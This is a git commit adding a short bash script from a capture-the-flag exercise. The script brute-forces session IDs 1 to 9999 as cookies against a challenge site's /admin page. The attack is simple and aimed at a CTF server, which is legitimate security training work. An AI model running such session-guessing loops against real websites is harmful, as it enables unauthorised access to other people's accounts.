Second CTFs part

This commit is contained in:
2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions

8
web-auth/too_small/force.sh Executable file
View File

@@ -0,0 +1,8 @@
#!/bin/bash
for i in $(seq 1 9999);
do
echo "Session id=$i"
curl -b "session_id=$i" http://too-small-reminder.challs.olicyber.it/admin
done